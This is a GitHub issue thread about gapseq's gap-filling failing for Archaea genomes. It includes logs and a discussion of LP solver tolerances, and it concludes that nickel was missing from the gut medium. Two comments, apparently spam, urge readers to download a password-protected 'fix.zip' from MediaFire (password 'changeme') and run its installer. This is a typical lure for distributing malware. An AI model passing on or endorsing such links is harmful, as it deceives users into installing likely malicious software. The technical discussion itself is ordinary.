### ISSUE TITLE
Gapfilling fails in step 1

### ISSUE THREAD

**Issue by cdiener** [jotech/gapseq#232]
Related to #228, opening a new bug since I can't reopen the old one and this is a new example. 

We are still seeing failures in gapfilling for Archaea with version 1.3.1. I attached an example from MGnify here.

### Environment

From [here](https://hub.docker.com/repository/docker/cdiener/gapseq/general).

```
gapseq version: 1.3.1
Sequence DB md5sum: 17e92c9 (2023-12-12, Bacteria)
Sequence DB md5sum: 8bb9575 (2023-12-12, Archaea)
```

### Commands

We use the gut medium bundled with gapseq. The script we run:

```bash
#!/bin/bash -ue
cp /home/isilon/users/o_diener/micom_dbs/recipes/uhgg/data/gut.csv medium.csv
gapseq fill -m MGYG000000522-draft.RDS -n medium.csv -c MGYG000000522-rxnWeights.RDS -b 100 -g MGYG000000522-rxnXgenes.RDS > MGYG000000522.log
gzip MGYG000000522.xml
```

Which will result in:

```
INFO [2024-08-27 15:30:20] Set BLAS to 1 thread.                                                                                         
Loading required package: glpkAPI                                                                                                        
using GLPK version 5.0                                                                                                                   
Warning message:                                                                                                                         
glpkAPI is used but cplexAPI is recommended because it is much faster                                                                    
Warning in gapfill4(mod.orig = mod.orig, mod.full = mod, rxn.weights = copy(rxn.weights),  :                                             
  Final model MGYG000000522 cannot produce enough target even when all candidate reactions are added! obj=0 lp_stat=5                    
Wrote file ./MGYG000000522.xml
```

### MRP

See the input files here: [uhgg_example.zip](https://github.com/user-attachments/files/16777679/uhgg_example.zip)

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Waschina** [comment]
Thanks again for posting the issue.

I tried to find the underlying problem but am not entirely there yet. What I found so far:
- the issue is unrelated to #228 in the sense that here, the issue occurs also with cplex as the solver.
- In the MRP, an infeasible flux distribution is predicted in the first gapfilling step, where all reactions from the biochemistry database are considered. However, both GLPK and CPLEX returned the solution as feasible. When reducing the metabolic network to those reactions predicted to carry a non-zero flux, the FBA predicts that no biomass formation is possible.
- Unrelated to that, I noticed that we have an option "--min.obj.val" in the `gapseq fill` module to set a minimum growth rate that gap-filling should achieve; yet, it was not enforced, and models with a growth rate less than the specified value are commonly returned. I fixed this with commit [fb7fbcb](https://github.com/jotech/gapseq/commit/fb7fbcb794606d14218d7611d67132a28b33365b). The example with  MGYG000000522 now works, but the issue from the previous point remains.

**Comment by cdiener** [comment]
Do you mean the initial MIP is feasible but then the model with non-zero indicators is infeasible? 
We had similar issues with the gapfilling in cobrapy and what helped is to lower the integrality tolerance because the default will sometimes [allow flux through zero indicator reactions otherwise](https://www.ibm.com/support/pages/why-does-binary-or-integer-variable-take-noninteger-value-solution). That happened with GLPK and CPLEX to us as well. Gurobi and HIGHS seem to be ab it less sensitive there.

**Comment by Waschina** [comment]
> Do you mean the initial MIP is feasible but then the model with non-zero indicators is infeasible?

Yes, just that in gapseq the initial problem is formulated as LP not as MIP ([Eq. 1 in the gapseq publication](https://genomebiology.biomedcentral.com/articles/10.1186/s13059-021-02295-1#Equ1)).

> We had similar issues with the gapfilling in cobrapy and what helped is to lower the integrality tolerance because the default will sometimes [allow flux through zero indicator reactions otherwise](https://www.ibm.com/support/pages/why-does-binary-or-integer-variable-take-noninteger-value-solution). That happened with GLPK and CPLEX to us as well. Gurobi and HIGHS seem to be ab it less sensitive there.

That is good to know; thank you! I will try to lower tolerance in glpk and cplex.

**Comment by cdiener** [comment]
Oh sorry, never mind then. Integrality tolerance has no effects on LPs, obviously.

**Comment by Waschina** [comment]
But it was a good hint – there is a simplex parameter in GLPK that controls tolerance for bound violations. I guess cplex has this, too. A first quick test with GLPK indicates that this value might need to be reduced for the initial LP. I'll do some further tests.

**Comment by Waschina** [comment]
The gapfilling algorithm was updated on the cobrar branch. The key was indeed to reduce the bound violation tolerance in cases where an optimal solution returned by the initial pFBA was not feasible and then re-run the optimization.
The [CPLEX documentation](https://www.ibm.com/docs/en/icos/20.1.0?topic=parameters-feasibility-tolerance) also recommends this procedure:
> You can also lower this tolerance after finding an optimal solution if there is any doubt that the solution is truly optimal.

"cobrar" needs to be updated to the current development version to work with the latest version of gapseq from the cobrar branch,

I will run a larger set of reconstructions with the new updates to see if something unexpected happens.

**Comment by cdiener** [comment]
Okay that makes sense. When we had similar problems in the CORDA port (somewhat similar idea with a linearized cost optimization) another gotcha was the threshold for the absolute flux value (`|v| > eps -> include). But it looks like you are already checking that by removing the reaction and ensuring the objective is maintained.

**Comment by cdiener** [comment]
Just as an FYI. For me, the provided example will still fail gapfilling silently (final growth rate of 0) evne when updating to the latest master branch.

**Comment by Waschina** [comment]
Yes, the master branch still relies on the sybil packages. Since the fix involved quite some changes in the gapfilling algorithm, I just made the changes to the "cobrar" branch of gapseq, which will be merged into the master branch hopefully soon.

**Comment by cdiener** [comment]
Sorry I meant in relation to:

> Unrelated to that, I noticed that we have an option "--min.obj.val" in the gapseq fill module to set a minimum growth rate that gap-filling should achieve; yet, it was not enforced, and models with a growth rate less than the specified value are commonly returned. I fixed this with commit [fb7fbcb](https://github.com/jotech/gapseq/commit/fb7fbcb794606d14218d7611d67132a28b33365b). The example with MGYG000000522 now works, but the issue from the previous point remains.

Even with commit fb7f MGYG000000522 did not work for me.

I will rebuild the image with the cobrar branch and test that one a bit more. Thanks for all the work on this!

**Comment by cdiener** [comment]
Hi @Waschina. I know had some time to test with the newqest cobrar branch but I am still seeing failures in step 1 of gapfilling for Archaea. It is now much more explicit in the logs:

```
LP solver: glpk 
Loading model files MGYG000001639-draft.RDS 
using media file medium.csv 


1. Initial gapfilling: Make model grow on given media using all reactions
No feasible gap-fill solution found. Relaxing pFBA coefficient 'c' to 5e-04 
No feasible gap-fill solution found. Relaxing pFBA coefficient 'c' to 0.00025 
No feasible gap-fill solution found. Relaxing pFBA coefficient 'c' to 0.000125 
No feasible gap-fill solution found. Relaxing pFBA coefficient 'c' to 6.25e-05 
No feasible gap-fill solution found. Relaxing pFBA coefficient 'c' to 3.125e-05 
No feasible gap-fill solution found. Relaxing pFBA coefficient 'c' to 1.5625e-05 
No feasible gap-fill solution found. Relaxing pFBA coefficient 'c' to 7.8125e-06 
No feasible gap-fill solution found. Relaxing pFBA coefficient 'c' to 3.90625e-06 
No feasible gap-fill solution found. Relaxing pFBA coefficient 'c' to 1.953125e-06 
No feasible gap-fill solution found. Relaxing pFBA coefficient 'c' to 9.765625e-07 
No feasible gap-fill solution found. Relaxing pFBA coefficient 'c' to 4.882813e-07 
No feasible gap-fill solution found. Relaxing pFBA coefficient 'c' to 2.441406e-07 
No feasible gap-fill solution found. Relaxing pFBA coefficient 'c' to 1.220703e-07 
No feasible gap-fill solution found. Relaxing pFBA coefficient 'c' to 6.103516e-08 
No feasible gap-fill solution found. Relaxing pFBA coefficient 'c' to 3.051758e-08 

Error in gapfill4(mod.orig = mod.orig, mod.full = mod, rxn.weights = copy(rxn.weights),  : 
  Initial gap-filling using all reactions was not successful although all available reactions were considered. Please check your gap-filling medium or consider reducing the minimum required growth rate.
Execution halted
```

This is using the gut medium as a base. Is it possible that the Archaea universal model can not grow on on the gut medium?

Best
```

**Comment by cdiener** [comment]
As an update I tried again without the gut medium (normal gapseq medium followed by fill) and that worked fine. So it's likely a mismatch between the universal models and the gut medium.

**Comment by Waschina** [comment]
Sorry for getting back to the issue this late. In the end, the problem was simply because Nickel (Ni2+) was missing from the gut medium. Nickel is part of the gapseq biomass for archaea.

When looking at the issue, I also noticed that for some genomes of the genus Methanobrevibacter, gapseq predicts the presence of nitrogenases. I guess this is a false prediction...
